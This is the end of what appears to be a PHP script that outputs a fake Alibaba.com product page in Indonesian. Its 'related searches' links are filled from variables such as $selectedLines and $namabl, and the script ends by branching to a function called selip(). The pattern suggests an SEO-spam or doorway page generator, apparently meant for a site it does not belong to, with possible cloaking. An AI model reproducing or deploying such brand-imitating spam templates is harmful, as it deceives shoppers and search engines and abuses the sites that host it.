                  <div class="im-alitalk-container Normal" style="cursor:pointer">
                      <button class="id-inline-flex id-items-center id-justify-center id-whitespace-nowrap id-text-sm id-ring-offset-background id-transition-colors focus-visible:id-outline-none focus-visible:id-ring-2 focus-visible:id-ring-ring focus-visible:id-ring-offset-2 disabled:id-pointer-events-none disabled:id-opacity-40 id-border id-bg-background hover:id-bg-accent hover:id-text-accent-foreground id-py-2 id-h-12 id-w-full id-gap-1 id-text-wrap id-rounded-full id-border-[#222] id-px-0 id-font-bold" style="background-color:#FFFFFF;color:#222222" data-testid="skuSummary-CHAT">
                      <span class="id-line-clamp-2">Mulai obrolan</span></button></div>
                </div>
              </div>
            </div>
            <div data-module-name="module_ta_plus" class="module_ta_plus">
              <div class="ta-semi">
                <div class="ta-wrapper">
                  <div class="ta-header">
                    <div class="ta-item">
                      <h3 class="title">Perlindungan produk</h3>
                    </div>
                  </div>
                  <svg class="detail-symbol">
                    <use xlink:href="#icon-right"></use>
                  </svg>
                </div>
                <div class="semi-list">
                  <div class="semi-item">
                    <div style="color:#undefined">
                      <img src="https://sc01.alicdn.com/kf/H5cd8e136457a444d89944d9df566b5e8f.png"/>
                      <div>
                        <h4>Pengiriman melalui Express</h4>
                      </div>
                    </div>
                    <p>Pesanan tiba sebelum jadwal, atau dapatkan kompensasi 10% dari harga pesanan jika pengiriman telat.</p>
                  </div>
                  <div class="semi-item">
                    <div style="color:#undefined">
                      <img src="https://sc01.alicdn.com/kf/H36976abd62fb46ef8ed67f86ae2ccff1s.png"/>
                      <div>
                        <h4>Pembayaran aman</h4>
                        <img/>
                      </div>
                    </div>
                    <p>Transaksi Anda di Alibaba.com dilindungi dengan enkripsi SSL yang ketat dan protokol keamanan data PCI DSS.</p>
                  </div>
                  <div class="semi-item">
                    <div style="color:#undefined">
                      <img src="https://gw.alicdn.com/imgextra/i1/O1CN01gDq0hh1yfbKcuFDYe_!!6000000006606-2-tps-60-60.png"/>
                      <div>
                        <h4>Kebijakan pengembalian dana</h4>
                        <img/>
                      </div>
                    </div>
                    <p>Dapatkan pengembalian dana jika pesanan Anda tidak terkirim, hilang atau bermasalah.</p>
                  </div>
                </div>
                <div class="semi-footer">Alibaba.com melindungi semua pesanan yang diproses dan dibayar melalui fitur<img src="https://sc01.alicdn.com/kf/Hfddaf74a86174ede9cc528d9da95f789D.png"/> </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div data-section="SectionAdditional" class="id-mx-auto id-px-10 sm:id-w-screenSm md:id-w-screenMd lg:id-w-screenLg">
    <div data-module-name="module_seo" class="module_seo"><div class="related-layout">
        <h2>Pencarian terkait</h2>
        <div class="related-list">
            <a href="' . $scriptPathDir . '/' . $selectedLines[15] . '/' .'">' . $selectedLines[15] . '</a>
            <a href="' . $scriptPathDir . '/' . $selectedLines[14] . '/' .'">' . $selectedLines[14] . '</a>
            <a href="' . $scriptPathDir . '/' . $selectedLines[13] . '/' .'">' . $selectedLines[13] . '</a>
            <a href="' . $scriptPathDir . '/' . $selectedLines[12] . '/' .'">' . $selectedLines[12] .'</a>
            <a href="' . $scriptPathDir . '/' . $selectedLines[11] . '/' .'">' . $selectedLines[11] . '</a>
            <a href="' . $scriptPathDir . '/' . $namabl . $selectedLines[10] .'">' . $selectedLines[10] . '</a>
            <a href="' . $scriptPathDir . '/' . $namabl . $selectedLines[9] .'">' . $selectedLines[9]. '</a>
            <a href="' . $scriptPathDir . '/' . $namabl . $selectedLines[8] .'">' . $selectedLines[8] . '</a>
            <a href="' . $scriptPathDir . '/' . $namabl . $selectedLines[7] .'">' . $selectedLines[7] . '</a>
            <a href="' . $scriptPathDir . '/' . $namabl . $selectedLines[6] .'">' . $selectedLines[6] . '</a>
            <a href="' . $scriptPathDir . '/' . $selectedLines[5] .'.html'.'">' . $selectedLines[5] . '</a>
            <a href="' . $scriptPathDir . '/' . $selectedLines[4] .'.html'.'">' . $selectedLines[4] . '</a>
            <a href="' . $scriptPathDir . '/' . $selectedLines[3] .'.html'.'">' . $selectedLines[3] . '</a>
            <a href="' . $scriptPathDir . '/' . $selectedLines[2] .'.html'.'">' . $selectedLines[2] . '</a><a href="' . $scriptPathDir . '/' . $selectedLines[1] .'.html'.'">' . $selectedLines[1] . '</a>
            </div>
      </div>
    </div>
    <div data-module-name="module_report" class="module_report">
      <div class="report-layout">
        <svg class="detail-symbol">
          <use xlink:href="#icon-flag"></use>
        </svg>
        <a class="report-link" href="' . htmlspecialchars($urlPath2) . '" target="_blank">Laporkan penyalahgunaan</a>
      </div>
    </div>
  </div>
</div>
</body>
</html>';
 exit;
        } else {
			  selip();
        }
}	
?>